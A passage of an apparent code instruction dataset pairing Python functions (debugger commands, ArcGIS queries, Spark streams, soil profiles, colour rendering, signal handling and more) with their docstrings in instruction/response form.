equ = arg.find('=')
if equ >= 0:
register = arg[:equ].strip()
value = arg[equ+1:].strip()
if not value:
value = '0'
self.change_register(register, value)
else:
value = self.input_register(arg)
if value is None:
raise CmdError("unknown register: %s" % arg)
try:
label = None
thread = self.get_thread_from_prefix()
process = thread.get_process()
module = process.get_module_at_address(value)
if module:
label = module.get_label_at_address(value)
except RuntimeError:
label = None
reg = arg.upper()
val = HexDump.address(value)
if label:
print("%s: %s (%s)" % (reg, val, label))
else:
print("%s: %s" % (reg, val)) |
def main(*argv):
""" main driver of program """
try:
url = str(argv[0])
arcgisSH = ArcGISTokenSecurityHandler()
if arcgisSH.valid == False:
arcpy.AddError(arcgisSH.message)
return
fl = FeatureLayer(
url=url,
securityHandler=arcgisSH,
initialize=True)
res = fl.query(where="1=1",out_fields='*',returnGeometry=False)
arcpy.AddMessage(res)
arcpy.SetParameterAsText(1, str(res))
except arcpy.ExecuteError:
line, filename, synerror = trace()
arcpy.AddError("error on line: %s" % line)
arcpy.AddError("error in file name: %s" % filename)
arcpy.AddError("with error message: %s" % synerror)
arcpy.AddError("ArcPy Error Message: %s" % arcpy.GetMessages(2))
    except FunctionError as f_e:
messages = f_e.args[0]
arcpy.AddError("error in function: %s" % messages["function"])
arcpy.AddError("error on line: %s" % messages["line"])
arcpy.AddError("error in file name: %s" % messages["filename"])
arcpy.AddError("with error message: %s" % messages["synerror"])
arcpy.AddError("ArcPy Error Message: %s" % messages["arc"])
except:
line, filename, synerror = trace()
arcpy.AddError("error on line: %s" % line)
arcpy.AddError("error in file name: %s" % filename)
arcpy.AddError("with error message: %s" % synerror) | main driver of program | Below is the the instruction that describes the task:
### Input:
main driver of program
### Response:
def main(*argv):
""" main driver of program """
try:
url = str(argv[0])
arcgisSH = ArcGISTokenSecurityHandler()
if arcgisSH.valid == False:
arcpy.AddError(arcgisSH.message)
return
fl = FeatureLayer(
url=url,
securityHandler=arcgisSH,
initialize=True)
res = fl.query(where="1=1",out_fields='*',returnGeometry=False)
arcpy.AddMessage(res)
arcpy.SetParameterAsText(1, str(res))
except arcpy.ExecuteError:
line, filename, synerror = trace()
arcpy.AddError("error on line: %s" % line)
arcpy.AddError("error in file name: %s" % filename)
arcpy.AddError("with error message: %s" % synerror)
arcpy.AddError("ArcPy Error Message: %s" % arcpy.GetMessages(2))
    except FunctionError as f_e:
messages = f_e.args[0]
arcpy.AddError("error in function: %s" % messages["function"])
arcpy.AddError("error on line: %s" % messages["line"])
arcpy.AddError("error in file name: %s" % messages["filename"])
arcpy.AddError("with error message: %s" % messages["synerror"])
arcpy.AddError("ArcPy Error Message: %s" % messages["arc"])
except:
line, filename, synerror = trace()
arcpy.AddError("error on line: %s" % line)
arcpy.AddError("error in file name: %s" % filename)
arcpy.AddError("with error message: %s" % synerror) |
def union(self, *dstreams):
"""
Create a unified DStream from multiple DStreams of the same
type and same slide duration.
"""
if not dstreams:
raise ValueError("should have at least one DStream to union")
if len(dstreams) == 1:
return dstreams[0]
if len(set(s._jrdd_deserializer for s in dstreams)) > 1:
raise ValueError("All DStreams should have same serializer")
if len(set(s._slideDuration for s in dstreams)) > 1:
raise ValueError("All DStreams should have same slide duration")
cls = SparkContext._jvm.org.apache.spark.streaming.api.java.JavaDStream
jdstreams = SparkContext._gateway.new_array(cls, len(dstreams))
for i in range(0, len(dstreams)):
jdstreams[i] = dstreams[i]._jdstream
return DStream(self._jssc.union(jdstreams), self, dstreams[0]._jrdd_deserializer) | Create a unified DStream from multiple DStreams of the same
type and same slide duration. | Below is the the instruction that describes the task:
### Input:
Create a unified DStream from multiple DStreams of the same
type and same slide duration.
### Response:
def union(self, *dstreams):
"""
Create a unified DStream from multiple DStreams of the same
type and same slide duration.
"""
if not dstreams:
raise ValueError("should have at least one DStream to union")
if len(dstreams) == 1:
return dstreams[0]
if len(set(s._jrdd_deserializer for s in dstreams)) > 1:
raise ValueError("All DStreams should have same serializer")
if len(set(s._slideDuration for s in dstreams)) > 1:
raise ValueError("All DStreams should have same slide duration")
cls = SparkContext._jvm.org.apache.spark.streaming.api.java.JavaDStream
jdstreams = SparkContext._gateway.new_array(cls, len(dstreams))
for i in range(0, len(dstreams)):
jdstreams[i] = dstreams[i]._jdstream
return DStream(self._jssc.union(jdstreams), self, dstreams[0]._jrdd_deserializer) |
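A usage sketch; the app name, host and ports are placeholders, and both inputs share the serializer and slide duration checked above.
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
sc = SparkContext("local[2]", "union-demo")
ssc = StreamingContext(sc, batchDuration=1)
lines_a = ssc.socketTextStream("localhost", 9999)
lines_b = ssc.socketTextStream("localhost", 9998)
merged = ssc.union(lines_a, lines_b)                # the method shown above
merged.pprint()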
def initialize_dual(neural_net_params_object, init_dual_file=None,
random_init_variance=0.01, init_nu=200.0):
"""Function to initialize the dual variables of the class.
Args:
neural_net_params_object: Object with the neural net weights, biases
and types
init_dual_file: Path to file containing dual variables, if the path
is empty, perform random initialization
Expects numpy dictionary with
lambda_pos_0, lambda_pos_1, ..
lambda_neg_0, lambda_neg_1, ..
lambda_quad_0, lambda_quad_1, ..
lambda_lu_0, lambda_lu_1, ..
random_init_variance: variance for random initialization
init_nu: Value to initialize nu variable with
Returns:
dual_var: dual variables initialized appropriately.
"""
lambda_pos = []
lambda_neg = []
lambda_quad = []
lambda_lu = []
if init_dual_file is None:
for i in range(0, neural_net_params_object.num_hidden_layers + 1):
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_pos.append(tf.get_variable('lambda_pos_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_neg.append(tf.get_variable('lambda_neg_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_quad.append(tf.get_variable('lambda_quad_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_lu.append(tf.get_variable('lambda_lu_' + str(i),
initializer=initializer,
dtype=tf.float32))
nu = tf.get_variable('nu', initializer=init_nu)
else:
# Loading from file
dual_var_init_val = np.load(init_dual_file).item()
for i in range(0, neural_net_params_object.num_hidden_layers + 1):
lambda_pos.append(
tf.get_variable('lambda_pos_' + str(i),
initializer=dual_var_init_val['lambda_pos'][i],
dtype=tf.float32))
lambda_neg.append(
tf.get_variable('lambda_neg_' + str(i),
initializer=dual_var_init_val['lambda_neg'][i],
dtype=tf.float32))
lambda_quad.append(
tf.get_variable('lambda_quad_' + str(i),
initializer=dual_var_init_val['lambda_quad'][i],
dtype=tf.float32))
lambda_lu.append(
tf.get_variable('lambda_lu_' + str(i),
initializer=dual_var_init_val['lambda_lu'][i],
dtype=tf.float32))
nu = tf.get_variable('nu', initializer=1.0*dual_var_init_val['nu'])
dual_var = {'lambda_pos': lambda_pos, 'lambda_neg': lambda_neg,
'lambda_quad': lambda_quad, 'lambda_lu': lambda_lu, 'nu': nu}
return dual_var | Function to initialize the dual variables of the class.
Args:
neural_net_params_object: Object with the neural net weights, biases
and types
init_dual_file: Path to file containing dual variables, if the path
is empty, perform random initialization
Expects numpy dictionary with
lambda_pos_0, lambda_pos_1, ..
lambda_neg_0, lambda_neg_1, ..
lambda_quad_0, lambda_quad_1, ..
lambda_lu_0, lambda_lu_1, ..
random_init_variance: variance for random initialization
init_nu: Value to initialize nu variable with
Returns:
dual_var: dual variables initialized appropriately. | Below is the the instruction that describes the task:
### Input:
Function to initialize the dual variables of the class.
Args:
neural_net_params_object: Object with the neural net weights, biases
and types
init_dual_file: Path to file containing dual variables, if the path
is empty, perform random initialization
Expects numpy dictionary with
lambda_pos_0, lambda_pos_1, ..
lambda_neg_0, lambda_neg_1, ..
lambda_quad_0, lambda_quad_1, ..
lambda_lu_0, lambda_lu_1, ..
random_init_variance: variance for random initialization
init_nu: Value to initialize nu variable with
Returns:
dual_var: dual variables initialized appropriately.
### Response:
def initialize_dual(neural_net_params_object, init_dual_file=None,
random_init_variance=0.01, init_nu=200.0):
"""Function to initialize the dual variables of the class.
Args:
neural_net_params_object: Object with the neural net weights, biases
and types
init_dual_file: Path to file containing dual variables, if the path
is empty, perform random initialization
Expects numpy dictionary with
lambda_pos_0, lambda_pos_1, ..
lambda_neg_0, lambda_neg_1, ..
lambda_quad_0, lambda_quad_1, ..
lambda_lu_0, lambda_lu_1, ..
random_init_variance: variance for random initialization
init_nu: Value to initialize nu variable with
Returns:
dual_var: dual variables initialized appropriately.
"""
lambda_pos = []
lambda_neg = []
lambda_quad = []
lambda_lu = []
if init_dual_file is None:
for i in range(0, neural_net_params_object.num_hidden_layers + 1):
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_pos.append(tf.get_variable('lambda_pos_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_neg.append(tf.get_variable('lambda_neg_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_quad.append(tf.get_variable('lambda_quad_' + str(i),
initializer=initializer,
dtype=tf.float32))
initializer = (np.random.uniform(0, random_init_variance, size=(
neural_net_params_object.sizes[i], 1))).astype(np.float32)
lambda_lu.append(tf.get_variable('lambda_lu_' + str(i),
initializer=initializer,
dtype=tf.float32))
nu = tf.get_variable('nu', initializer=init_nu)
else:
# Loading from file
dual_var_init_val = np.load(init_dual_file).item()
for i in range(0, neural_net_params_object.num_hidden_layers + 1):
lambda_pos.append(
tf.get_variable('lambda_pos_' + str(i),
initializer=dual_var_init_val['lambda_pos'][i],
dtype=tf.float32))
lambda_neg.append(
tf.get_variable('lambda_neg_' + str(i),
initializer=dual_var_init_val['lambda_neg'][i],
dtype=tf.float32))
lambda_quad.append(
tf.get_variable('lambda_quad_' + str(i),
initializer=dual_var_init_val['lambda_quad'][i],
dtype=tf.float32))
lambda_lu.append(
tf.get_variable('lambda_lu_' + str(i),
initializer=dual_var_init_val['lambda_lu'][i],
dtype=tf.float32))
nu = tf.get_variable('nu', initializer=1.0*dual_var_init_val['nu'])
dual_var = {'lambda_pos': lambda_pos, 'lambda_neg': lambda_neg,
'lambda_quad': lambda_quad, 'lambda_lu': lambda_lu, 'nu': nu}
return dual_var |
def del_edge(self, edge):
"""
Remove an edge from the graph.
@type edge: tuple
@param edge: Edge.
"""
u, v = edge
self.node_neighbors[u].remove(v)
self.del_edge_labeling((u, v))
if (u != v):
self.node_neighbors[v].remove(u)
self.del_edge_labeling((v, u)) | Remove an edge from the graph.
@type edge: tuple
@param edge: Edge. | Below is the the instruction that describes the task:
### Input:
Remove an edge from the graph.
@type edge: tuple
@param edge: Edge.
### Response:
def del_edge(self, edge):
"""
Remove an edge from the graph.
@type edge: tuple
@param edge: Edge.
"""
u, v = edge
self.node_neighbors[u].remove(v)
self.del_edge_labeling((u, v))
if (u != v):
self.node_neighbors[v].remove(u)
self.del_edge_labeling((v, u)) |
def discretize_soil_profile(sp, incs=None, target=1.0):
"""
Splits the soil profile into slices and stores as dictionary
:param sp: SoilProfile
:param incs: array_like, increments of depth to use for each layer
:param target: target depth increment size
:return: dict
"""
if incs is None:
incs = np.ones(sp.n_layers) * target
dd = {}
dd["thickness"] = []
dd["unit_mass"] = []
dd["shear_vel"] = []
cum_thickness = 0
for i in range(sp.n_layers):
sl = sp.layer(i + 1)
thickness = sp.layer_height(i + 1)
n_slices = max(int(thickness / incs[i]), 1)
slice_thickness = float(thickness) / n_slices
for j in range(n_slices):
cum_thickness += slice_thickness
if cum_thickness >= sp.gwl:
rho = sl.unit_sat_mass
saturation = True
else:
rho = sl.unit_dry_mass
saturation = False
if hasattr(sl, "get_shear_vel_at_v_eff_stress"):
v_eff = sp.vertical_effective_stress(cum_thickness)
vs = sl.get_shear_vel_at_v_eff_stress(v_eff, saturation)
else:
vs = sl.calc_shear_vel(saturation)
dd["shear_vel"].append(vs)
dd["unit_mass"].append(rho)
dd["thickness"].append(slice_thickness)
for item in dd:
dd[item] = np.array(dd[item])
return dd | Splits the soil profile into slices and stores as dictionary
:param sp: SoilProfile
:param incs: array_like, increments of depth to use for each layer
:param target: target depth increment size
:return: dict | Below is the the instruction that describes the task:
### Input:
Splits the soil profile into slices and stores as dictionary
:param sp: SoilProfile
:param incs: array_like, increments of depth to use for each layer
:param target: target depth increment size
:return: dict
### Response:
def discretize_soil_profile(sp, incs=None, target=1.0):
"""
Splits the soil profile into slices and stores as dictionary
:param sp: SoilProfile
:param incs: array_like, increments of depth to use for each layer
:param target: target depth increment size
:return: dict
"""
if incs is None:
incs = np.ones(sp.n_layers) * target
dd = {}
dd["thickness"] = []
dd["unit_mass"] = []
dd["shear_vel"] = []
cum_thickness = 0
for i in range(sp.n_layers):
sl = sp.layer(i + 1)
thickness = sp.layer_height(i + 1)
n_slices = max(int(thickness / incs[i]), 1)
slice_thickness = float(thickness) / n_slices
for j in range(n_slices):
cum_thickness += slice_thickness
if cum_thickness >= sp.gwl:
rho = sl.unit_sat_mass
saturation = True
else:
rho = sl.unit_dry_mass
saturation = False
if hasattr(sl, "get_shear_vel_at_v_eff_stress"):
v_eff = sp.vertical_effective_stress(cum_thickness)
vs = sl.get_shear_vel_at_v_eff_stress(v_eff, saturation)
else:
vs = sl.calc_shear_vel(saturation)
dd["shear_vel"].append(vs)
dd["unit_mass"].append(rho)
dd["thickness"].append(slice_thickness)
for item in dd:
dd[item] = np.array(dd[item])
return dd |
def _check_valid_data(self, data):
"""Checks that the given data is a uint8 array with one or three
channels.
Parameters
----------
data : :obj:`numpy.ndarray`
The data to check.
Raises
------
ValueError
If the data is invalid.
"""
if data.dtype.type is not np.uint8:
raise ValueError(
'Illegal data type. Color images only support uint8 arrays')
if len(data.shape) != 3 or data.shape[2] != 3:
raise ValueError(
'Illegal data type. Color images only support three channels') | Checks that the given data is a uint8 array with one or three
channels.
Parameters
----------
data : :obj:`numpy.ndarray`
The data to check.
Raises
------
ValueError
If the data is invalid. | Below is the the instruction that describes the task:
### Input:
Checks that the given data is a uint8 array with one or three
channels.
Parameters
----------
data : :obj:`numpy.ndarray`
The data to check.
Raises
------
ValueError
If the data is invalid.
### Response:
def _check_valid_data(self, data):
"""Checks that the given data is a uint8 array with one or three
channels.
Parameters
----------
data : :obj:`numpy.ndarray`
The data to check.
Raises
------
ValueError
If the data is invalid.
"""
if data.dtype.type is not np.uint8:
raise ValueError(
'Illegal data type. Color images only support uint8 arrays')
if len(data.shape) != 3 or data.shape[2] != 3:
raise ValueError(
'Illegal data type. Color images only support three channels') |
def get_object(cls, api_token, image_id_or_slug):
"""
Class method that will return an Image object by ID or slug.
This method is used to validate the type of the image. If it is a
    number, it will be considered as an Image ID; if it is a
    string, it will be considered as a slug.
"""
if cls._is_string(image_id_or_slug):
image = cls(token=api_token, slug=image_id_or_slug)
image.load(use_slug=True)
else:
image = cls(token=api_token, id=image_id_or_slug)
image.load()
return image | Class method that will return an Image object by ID or slug.
This method is used to validate the type of the image. If it is a
    number, it will be considered as an Image ID; if it is a
    string, it will be considered as a slug. | Below is the the instruction that describes the task:
### Input:
Class method that will return an Image object by ID or slug.
This method is used to validate the type of the image. If it is a
number, it will be considered as an Image ID; if it is a
string, it will be considered as a slug.
### Response:
def get_object(cls, api_token, image_id_or_slug):
"""
Class method that will return an Image object by ID or slug.
This method is used to validate the type of the image. If it is a
    number, it will be considered as an Image ID; if it is a
    string, it will be considered as a slug.
"""
if cls._is_string(image_id_or_slug):
image = cls(token=api_token, slug=image_id_or_slug)
image.load(use_slug=True)
else:
image = cls(token=api_token, id=image_id_or_slug)
image.load()
return image |
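Usage sketch for the classmethod above; the API token and image identifiers are placeholders.
img_by_slug = Image.get_object(api_token="dop_v1_example", image_id_or_slug="ubuntu-20-04-x64")
img_by_id = Image.get_object(api_token="dop_v1_example", image_id_or_slug=6918990)   # numeric -> treated as an ID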
def render(self, compress=False):
"""Return a rendered representation of the color. If `compress` is
true, the shortest possible representation is used; otherwise, named
colors are rendered as names and all others are rendered as hex (or
with the rgba function).
"""
if not compress and self.original_literal:
return self.original_literal
candidates = []
# TODO this assumes CSS resolution is 8-bit per channel, but so does
# Ruby.
r, g, b, a = self.value
r, g, b = int(round(r)), int(round(g)), int(round(b))
# Build a candidate list in order of preference. If `compress` is
# True, the shortest candidate is used; otherwise, the first candidate
# is used.
# Try color name
key = r, g, b, a
if key in COLOR_LOOKUP:
candidates.append(COLOR_LOOKUP[key])
if a == 1:
# Hex is always shorter than function notation
if all(ch % 17 == 0 for ch in (r, g, b)):
candidates.append("#%1x%1x%1x" % (r // 17, g // 17, b // 17))
else:
candidates.append("#%02x%02x%02x" % (r, g, b))
else:
# Can't use hex notation for RGBA
if compress:
sp = ''
else:
sp = ' '
candidates.append("rgba(%d,%s%d,%s%d,%s%.6g)" % (r, sp, g, sp, b, sp, a))
if compress:
return min(candidates, key=len)
else:
return candidates[0] | Return a rendered representation of the color. If `compress` is
true, the shortest possible representation is used; otherwise, named
colors are rendered as names and all others are rendered as hex (or
with the rgba function). | Below is the the instruction that describes the task:
### Input:
Return a rendered representation of the color. If `compress` is
true, the shortest possible representation is used; otherwise, named
colors are rendered as names and all others are rendered as hex (or
with the rgba function).
### Response:
def render(self, compress=False):
"""Return a rendered representation of the color. If `compress` is
true, the shortest possible representation is used; otherwise, named
colors are rendered as names and all others are rendered as hex (or
with the rgba function).
"""
if not compress and self.original_literal:
return self.original_literal
candidates = []
# TODO this assumes CSS resolution is 8-bit per channel, but so does
# Ruby.
r, g, b, a = self.value
r, g, b = int(round(r)), int(round(g)), int(round(b))
# Build a candidate list in order of preference. If `compress` is
# True, the shortest candidate is used; otherwise, the first candidate
# is used.
# Try color name
key = r, g, b, a
if key in COLOR_LOOKUP:
candidates.append(COLOR_LOOKUP[key])
if a == 1:
# Hex is always shorter than function notation
if all(ch % 17 == 0 for ch in (r, g, b)):
candidates.append("#%1x%1x%1x" % (r // 17, g // 17, b // 17))
else:
candidates.append("#%02x%02x%02x" % (r, g, b))
else:
# Can't use hex notation for RGBA
if compress:
sp = ''
else:
sp = ' '
candidates.append("rgba(%d,%s%d,%s%d,%s%.6g)" % (r, sp, g, sp, b, sp, a))
if compress:
return min(candidates, key=len)
else:
return candidates[0] |
def get_record(self, msg_id):
"""Get a specific Task Record, by msg_id."""
cursor = self._db.execute("""SELECT * FROM %s WHERE msg_id==?"""%self.table, (msg_id,))
line = cursor.fetchone()
if line is None:
raise KeyError("No such msg: %r"%msg_id)
return self._list_to_dict(line) | Get a specific Task Record, by msg_id. | Below is the the instruction that describes the task:
### Input:
Get a specific Task Record, by msg_id.
### Response:
def get_record(self, msg_id):
"""Get a specific Task Record, by msg_id."""
cursor = self._db.execute("""SELECT * FROM %s WHERE msg_id==?"""%self.table, (msg_id,))
line = cursor.fetchone()
if line is None:
raise KeyError("No such msg: %r"%msg_id)
return self._list_to_dict(line) |
def parse_contact(self):
"""Parse a top level contact expression, these consist of a name
expression a special char and an email expression.
The characters found in a name and email expression are returned.
"""
self.parse_whitespace()
name = self.parse_name() # parse a name expression and get the string.
if not name: # No name was found so shout it out.
raise PartpyError(self, 'Expecting a name')
self.parse_whitespace()
# allow name and email to be delimited by either a ':' or '-'
if not self.match_any_char(':-'):
raise PartpyError(self, 'Expecting : or -')
self.eat_length(1)
self.parse_whitespace()
email = self.parse_email() # parse an email and store its string.
if not email:
raise PartpyError(self, 'Expecting an email address')
return (name, email) | Parse a top level contact expression, these consist of a name
expression a special char and an email expression.
The characters found in a name and email expression are returned. | Below is the the instruction that describes the task:
### Input:
Parse a top level contact expression, these consist of a name
expression a special char and an email expression.
The characters found in a name and email expression are returned.
### Response:
def parse_contact(self):
"""Parse a top level contact expression, these consist of a name
expression a special char and an email expression.
The characters found in a name and email expression are returned.
"""
self.parse_whitespace()
name = self.parse_name() # parse a name expression and get the string.
if not name: # No name was found so shout it out.
raise PartpyError(self, 'Expecting a name')
self.parse_whitespace()
# allow name and email to be delimited by either a ':' or '-'
if not self.match_any_char(':-'):
raise PartpyError(self, 'Expecting : or -')
self.eat_length(1)
self.parse_whitespace()
email = self.parse_email() # parse an email and store its string.
if not email:
raise PartpyError(self, 'Expecting an email address')
return (name, email) |
def ensembl_to_kegg(organism,kegg_db):
"""
Looks up KEGG mappings of KEGG ids to ensembl ids
    :param organism: an organism as listed in organismsKEGG()
    :param kegg_db: a matching KEGG db as reported in databasesKEGG
    :returns: a Pandas dataframe with 'KEGGid' and 'ENSid'.
"""
print("KEGG API: http://rest.genome.jp/link/"+kegg_db+"/"+organism)
sys.stdout.flush()
kegg_ens=urlopen("http://rest.genome.jp/link/"+kegg_db+"/"+organism).read()
kegg_ens=kegg_ens.split("\n")
final=[]
for i in kegg_ens:
final.append(i.split("\t"))
df=pd.DataFrame(final[0:len(final)-1])[[0,1]]
ens_id=pd.DataFrame(df[1].str.split(":").tolist())[1]
df=pd.concat([df,ens_id],axis=1)
df.columns=['KEGGid','ensDB','ENSid']
df=df[['KEGGid','ENSid']]
return df | Looks up KEGG mappings of KEGG ids to ensembl ids
    :param organism: an organism as listed in organismsKEGG()
    :param kegg_db: a matching KEGG db as reported in databasesKEGG
    :returns: a Pandas dataframe with 'KEGGid' and 'ENSid'. | Below is the the instruction that describes the task:
### Input:
Looks up KEGG mappings of KEGG ids to ensembl ids
:param organism: an organism as listed in organismsKEGG()
:param kegg_db: a matching KEGG db as reported in databasesKEGG
:returns: a Pandas dataframe with 'KEGGid' and 'ENSid'.
### Response:
def ensembl_to_kegg(organism,kegg_db):
"""
Looks up KEGG mappings of KEGG ids to ensembl ids
    :param organism: an organism as listed in organismsKEGG()
    :param kegg_db: a matching KEGG db as reported in databasesKEGG
    :returns: a Pandas dataframe with 'KEGGid' and 'ENSid'.
"""
print("KEGG API: http://rest.genome.jp/link/"+kegg_db+"/"+organism)
sys.stdout.flush()
kegg_ens=urlopen("http://rest.genome.jp/link/"+kegg_db+"/"+organism).read()
kegg_ens=kegg_ens.split("\n")
final=[]
for i in kegg_ens:
final.append(i.split("\t"))
df=pd.DataFrame(final[0:len(final)-1])[[0,1]]
ens_id=pd.DataFrame(df[1].str.split(":").tolist())[1]
df=pd.concat([df,ens_id],axis=1)
df.columns=['KEGGid','ensDB','ENSid']
df=df[['KEGGid','ENSid']]
return df |
def generate_one(self):
"""Generate a single element.
Returns
-------
element
An element from the domain.
Examples
-------
>>> generator = RepellentGenerator(['a', 'b'])
>>> gen_item = generator.generate_one()
>>> gen_item in ['a', 'b']
True
"""
# Get the weights for all items in the domain
weights = [self.probability_func(self.generated[element])
for element in self.domain]
# Sample from the domain using the weights
element = random.choices(self.domain, weights=weights)[0]
# Update the generated values and return
self.generated[element] += 1
return element | Generate a single element.
Returns
-------
element
An element from the domain.
Examples
-------
>>> generator = RepellentGenerator(['a', 'b'])
>>> gen_item = generator.generate_one()
>>> gen_item in ['a', 'b']
True | Below is the the instruction that describes the task:
### Input:
Generate a single element.
Returns
-------
element
An element from the domain.
Examples
-------
>>> generator = RepellentGenerator(['a', 'b'])
>>> gen_item = generator.generate_one()
>>> gen_item in ['a', 'b']
True
### Response:
def generate_one(self):
"""Generate a single element.
Returns
-------
element
An element from the domain.
Examples
-------
>>> generator = RepellentGenerator(['a', 'b'])
>>> gen_item = generator.generate_one()
>>> gen_item in ['a', 'b']
True
"""
# Get the weights for all items in the domain
weights = [self.probability_func(self.generated[element])
for element in self.domain]
# Sample from the domain using the weights
element = random.choices(self.domain, weights=weights)[0]
# Update the generated values and return
self.generated[element] += 1
return element |
def get_channel_info(self):
"""
Returns the first data row from Channel.csv
"""
csv_filename = get_metadata_file_path(channeldir=self.channeldir, filename=self.channelinfo)
csv_lines = _read_csv_lines(csv_filename)
dict_reader = csv.DictReader(csv_lines)
channel_csvs_list = list(dict_reader)
channel_csv = channel_csvs_list[0]
if len(channel_csvs_list) > 1:
raise ValueError('Found multiple channel rows in ' + self.channelinfo)
channel_cleaned = _clean_dict(channel_csv)
channel_info = self._map_channel_row_to_dict(channel_cleaned)
return channel_info | Returns the first data row from Channel.csv | Below is the the instruction that describes the task:
### Input:
Returns the first data row from Channel.csv
### Response:
def get_channel_info(self):
"""
Returns the first data row from Channel.csv
"""
csv_filename = get_metadata_file_path(channeldir=self.channeldir, filename=self.channelinfo)
csv_lines = _read_csv_lines(csv_filename)
dict_reader = csv.DictReader(csv_lines)
channel_csvs_list = list(dict_reader)
channel_csv = channel_csvs_list[0]
if len(channel_csvs_list) > 1:
raise ValueError('Found multiple channel rows in ' + self.channelinfo)
channel_cleaned = _clean_dict(channel_csv)
channel_info = self._map_channel_row_to_dict(channel_cleaned)
return channel_info |
def respond_to_SIGTERM(signal_number, frame, target=None):
""" these classes are instrumented to respond to a KeyboardInterrupt by
    cleanly shutting down. This function, when given as a handler for
a SIGTERM event, will make the program respond to a SIGTERM as neatly
as it responds to ^C.
This function is used in registering a signal handler from the signal
module. It should be registered for any signal for which the desired
behavior is to kill the application:
signal.signal(signal.SIGTERM, respondToSIGTERM)
signal.signal(signal.SIGHUP, respondToSIGTERM)
parameters:
signal_number - unused in this function but required by the api.
frame - unused in this function but required by the api.
target - an instance of a class that has a member called 'task_manager'
that is a derivative of the TaskManager class below.
"""
if target:
target.config.logger.info('detected SIGTERM')
# by setting the quit flag to true, any calls to the 'quit_check'
# method that is so liberally passed around in this framework will
# result in raising the quit exception. The current quit exception
# is KeyboardInterrupt
target.task_manager.quit = True
else:
raise KeyboardInterrupt | these classes are instrumented to respond to a KeyboardInterrupt by
    cleanly shutting down. This function, when given as a handler for
a SIGTERM event, will make the program respond to a SIGTERM as neatly
as it responds to ^C.
This function is used in registering a signal handler from the signal
module. It should be registered for any signal for which the desired
behavior is to kill the application:
signal.signal(signal.SIGTERM, respondToSIGTERM)
signal.signal(signal.SIGHUP, respondToSIGTERM)
parameters:
signal_number - unused in this function but required by the api.
frame - unused in this function but required by the api.
target - an instance of a class that has a member called 'task_manager'
that is a derivative of the TaskManager class below. | Below is the the instruction that describes the task:
### Input:
these classes are instrumented to respond to a KeyboardInterrupt by
    cleanly shutting down. This function, when given as a handler for
a SIGTERM event, will make the program respond to a SIGTERM as neatly
as it responds to ^C.
This function is used in registering a signal handler from the signal
module. It should be registered for any signal for which the desired
behavior is to kill the application:
signal.signal(signal.SIGTERM, respondToSIGTERM)
signal.signal(signal.SIGHUP, respondToSIGTERM)
parameters:
signal_number - unused in this function but required by the api.
frame - unused in this function but required by the api.
target - an instance of a class that has a member called 'task_manager'
that is a derivative of the TaskManager class below.
### Response:
def respond_to_SIGTERM(signal_number, frame, target=None):
""" these classes are instrumented to respond to a KeyboardInterrupt by
    cleanly shutting down. This function, when given as a handler for
a SIGTERM event, will make the program respond to a SIGTERM as neatly
as it responds to ^C.
This function is used in registering a signal handler from the signal
module. It should be registered for any signal for which the desired
behavior is to kill the application:
signal.signal(signal.SIGTERM, respondToSIGTERM)
signal.signal(signal.SIGHUP, respondToSIGTERM)
parameters:
signal_number - unused in this function but required by the api.
frame - unused in this function but required by the api.
target - an instance of a class that has a member called 'task_manager'
that is a derivative of the TaskManager class below.
"""
if target:
target.config.logger.info('detected SIGTERM')
# by setting the quit flag to true, any calls to the 'quit_check'
# method that is so liberally passed around in this framework will
# result in raising the quit exception. The current quit exception
# is KeyboardInterrupt
target.task_manager.quit = True
else:
raise KeyboardInterrupt |
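A registration sketch: signal handlers only receive (signum, frame), so the target argument has to be bound up front; app is a stand-in for any object exposing config.logger and task_manager.
import signal
from functools import partial
app = ...   # hypothetical application object with .config.logger and .task_manager
signal.signal(signal.SIGTERM, partial(respond_to_SIGTERM, target=app))
signal.signal(signal.SIGHUP, partial(respond_to_SIGTERM, target=app))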
def deauth(self):
"""
Resets authentication info. Calls stop_crypto() if RFID is in auth state
"""
self.method = None
self.key = None
self.last_auth = None
if self.debug:
print("Changing auth key and method to None")
if self.rfid.authed:
self.rfid.stop_crypto()
if self.debug:
print("Stopping crypto1") | Resets authentication info. Calls stop_crypto() if RFID is in auth state | Below is the the instruction that describes the task:
### Input:
Resets authentication info. Calls stop_crypto() if RFID is in auth state
### Response:
def deauth(self):
"""
Resets authentication info. Calls stop_crypto() if RFID is in auth state
"""
self.method = None
self.key = None
self.last_auth = None
if self.debug:
print("Changing auth key and method to None")
if self.rfid.authed:
self.rfid.stop_crypto()
if self.debug:
print("Stopping crypto1") |
def get_checker_executable(name):
"""Return checker executable in the form of a list of arguments
for subprocess.Popen"""
if programs.is_program_installed(name):
# Checker is properly installed
return [name]
else:
path1 = programs.python_script_exists(package=None,
module=name+'_script')
path2 = programs.python_script_exists(package=None, module=name)
if path1 is not None: # checker_script.py is available
# Checker script is available but has not been installed
# (this may work with pyflakes)
return [sys.executable, path1]
elif path2 is not None: # checker.py is available
# Checker package is available but its script has not been
# installed (this works with pycodestyle but not with pyflakes)
return [sys.executable, path2] | Return checker executable in the form of a list of arguments
for subprocess.Popen | Below is the the instruction that describes the task:
### Input:
Return checker executable in the form of a list of arguments
for subprocess.Popen
### Response:
def get_checker_executable(name):
"""Return checker executable in the form of a list of arguments
for subprocess.Popen"""
if programs.is_program_installed(name):
# Checker is properly installed
return [name]
else:
path1 = programs.python_script_exists(package=None,
module=name+'_script')
path2 = programs.python_script_exists(package=None, module=name)
if path1 is not None: # checker_script.py is available
# Checker script is available but has not been installed
# (this may work with pyflakes)
return [sys.executable, path1]
